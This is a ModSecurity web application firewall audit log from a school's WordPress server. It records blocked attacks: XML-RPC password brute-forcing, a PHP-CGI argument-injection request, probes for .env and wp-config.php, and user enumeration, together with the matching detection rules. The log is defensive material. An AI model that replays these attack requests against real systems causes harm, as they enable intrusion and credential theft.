X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --89604a5f-C-- wp.getUsersBlogs miswan password12 --89604a5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89604a5f-E-- --89604a5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (126+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516668192982 5312 (- - -) Stopwatch2: 1745516668192982 5312; combined=3646, p1=475, p2=3012, p3=0, p4=0, p5=93, sr=92, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89604a5f-Z-- --9bca3c45-A-- [25/Apr/2025:00:45:28 +0700] aAp4uGLuk3f9kLjsdTanPgAAAIY 103.236.140.4 48278 103.236.140.4 8181 --9bca3c45-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9bca3c45-C-- wp.getUsersBlogs miswan administrators --9bca3c45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bca3c45-E-- --9bca3c45-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (126+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516728104922 4348 (- - -) Stopwatch2: 1745516728104922 4348; combined=3090, p1=410, p2=2532, p3=0, p4=0, p5=90, sr=75, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bca3c45-Z-- --f906fb6b-A-- [25/Apr/2025:00:45:42 +0700] aAp4xt5yz20UX9VrdZPrHAAAAE4 103.236.140.4 48900 103.236.140.4 8181 --f906fb6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f906fb6b-C-- wp.getUsersBlogs miswan 1234%^&* --f906fb6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f906fb6b-E-- --f906fb6b-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516742357681 6215 (- - -) Stopwatch2: 1745516742357681 6215; combined=4366, p1=545, p2=3632, p3=0, p4=0, p5=114, sr=91, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f906fb6b-Z-- --0ae11e38-A-- [25/Apr/2025:00:46:28 +0700] aAp49GLuk3f9kLjsdTaoUQAAAIA 103.236.140.4 51746 103.236.140.4 8181 --0ae11e38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0ae11e38-C-- wp.getUsersBlogs miswan sophie --0ae11e38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ae11e38-E-- --0ae11e38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (137+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516788166100 4960 (- - -) Stopwatch2: 1745516788166100 4960; combined=3715, p1=452, p2=3085, p3=0, p4=0, p5=104, sr=86, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ae11e38-Z-- --3ddb4a20-A-- [25/Apr/2025:00:47:28 +0700] aAp5MGLuk3f9kLjsdTapKwAAAIY 103.236.140.4 54768 103.236.140.4 8181 --3ddb4a20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3ddb4a20-C-- wp.getUsersBlogs miswan mother --3ddb4a20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ddb4a20-E-- --3ddb4a20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (138+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516848319225 4777 (- - -) Stopwatch2: 1745516848319225 4777; combined=3709, p1=428, p2=3107, p3=0, p4=0, p5=102, sr=89, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ddb4a20-Z-- --d6e1ad49-A-- [25/Apr/2025:00:48:28 +0700] aAp5bN5yz20UX9VrdZPtsQAAAFA 103.236.140.4 58954 103.236.140.4 8181 --d6e1ad49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d6e1ad49-C-- wp.getUsersBlogs miswan 1g2w3e4r --d6e1ad49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6e1ad49-E-- --d6e1ad49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (141+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516908289210 4978 (- - -) Stopwatch2: 1745516908289210 4978; combined=3755, p1=431, p2=3137, p3=0, p4=0, p5=110, sr=88, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6e1ad49-Z-- --21ef3347-A-- [25/Apr/2025:01:31:14 +0700] aAqDcmLuk3f9kLjsdTa-LgAAAIs 103.236.140.4 35196 103.236.140.4 8181 --21ef3347-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --21ef3347-C-- --21ef3347-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21ef3347-E-- --21ef3347-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745519474667632 4577 (- - -) Stopwatch2: 1745519474667632 4577; combined=3203, p1=467, p2=2703, p3=0, p4=0, p5=32, sr=63, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21ef3347-Z-- --6ef3ef29-A-- [25/Apr/2025:01:40:44 +0700] aAqFrN5yz20UX9VrdZMGFgAAAEs 103.236.140.4 49642 103.236.140.4 8181 --6ef3ef29-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 46.101.111.185 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --6ef3ef29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ef3ef29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745520044087495 739 (- - -) Stopwatch2: 1745520044087495 739; combined=320, p1=267, p2=0, p3=0, p4=0, p5=52, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ef3ef29-Z-- --f5f86442-A-- [25/Apr/2025:02:05:09 +0700] aAqLZclQo524fhbIj1zWfgAAAA0 103.236.140.4 44850 103.236.140.4 8181 --f5f86442-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.160.182.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.160.182.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f5f86442-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5f86442-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745521509425365 3272 (- - -) Stopwatch2: 1745521509425365 3272; combined=1432, p1=437, p2=962, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5f86442-Z-- --9a5cdc7a-A-- [25/Apr/2025:02:11:04 +0700] aAqMyMlQo524fhbIj1zXSwAAABA 103.236.140.4 46222 103.236.140.4 8181 --9a5cdc7a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 54.36.61.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 54.36.61.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9a5cdc7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a5cdc7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745521864921252 2859 (- - -) Stopwatch2: 1745521864921252 2859; combined=1279, p1=420, p2=829, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a5cdc7a-Z-- --a809ff1f-A-- [25/Apr/2025:02:32:58 +0700] aAqR6slQo524fhbIj1zYkQAAAA8 103.236.140.4 51448 103.236.140.4 8181 --a809ff1f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.95.35.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.95.35.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a809ff1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a809ff1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745523178032644 2403 (- - -) Stopwatch2: 1745523178032644 2403; combined=1305, p1=399, p2=868, p3=0, p4=0, p5=38, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a809ff1f-Z-- --8cadf627-A-- [25/Apr/2025:02:40:28 +0700] aAqTrMlQo524fhbIj1zY8wAAAAs 103.236.140.4 53324 103.236.140.4 8181 --8cadf627-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.47.25 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 188.166.47.25 Accept-Encoding: gzip X-Varnish: 136635919 --8cadf627-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8cadf627-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745523628683195 804 (- - -) Stopwatch2: 1745523628683195 804; combined=293, p1=258, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cadf627-Z-- --58bbf30c-A-- [25/Apr/2025:02:41:12 +0700] aAqT2MlQo524fhbIj1zZAQAAAAA 103.236.140.4 53588 103.236.140.4 8181 --58bbf30c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.240.2.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.240.2.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --58bbf30c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58bbf30c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745523672341796 2689 (- - -) Stopwatch2: 1745523672341796 2689; combined=1347, p1=459, p2=859, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58bbf30c-Z-- --f2f58752-A-- [25/Apr/2025:02:46:56 +0700] aAqVMGLuk3f9kLjsdTbIxgAAAIs 103.236.140.4 55494 103.236.140.4 8181 --f2f58752-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.162 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --f2f58752-C-- --f2f58752-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2f58752-E-- --f2f58752-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745524016934292 3826 (- - -) Stopwatch2: 1745524016934292 3826; combined=2675, p1=448, p2=2196, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2f58752-Z-- --64ae563b-A-- [25/Apr/2025:03:05:35 +0700] aAqZj_iVYlyO1xhz7yMCxwAAAMU 103.236.140.4 59986 103.236.140.4 8181 --64ae563b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.51.122.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.51.122.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --64ae563b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64ae563b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745525135017429 3597 (- - -) Stopwatch2: 1745525135017429 3597; combined=2356, p1=716, p2=1601, p3=0, p4=0, p5=38, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64ae563b-Z-- --13a47f0c-A-- [25/Apr/2025:03:33:21 +0700] aAqgEeOdEP6frSVs8CoeEwAAABA 103.236.140.4 48350 103.236.140.4 8181 --13a47f0c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.123.236.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.123.236.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --13a47f0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13a47f0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745526801600158 3375 (- - -) Stopwatch2: 1745526801600158 3375; combined=1433, p1=508, p2=895, p3=0, p4=0, p5=30, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13a47f0c-Z-- --34c45516-A-- [25/Apr/2025:03:46:00 +0700] aAqjCPKu9d5eAb6Kn9_aqAAAANY 103.236.140.4 51360 103.236.140.4 8181 --34c45516-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 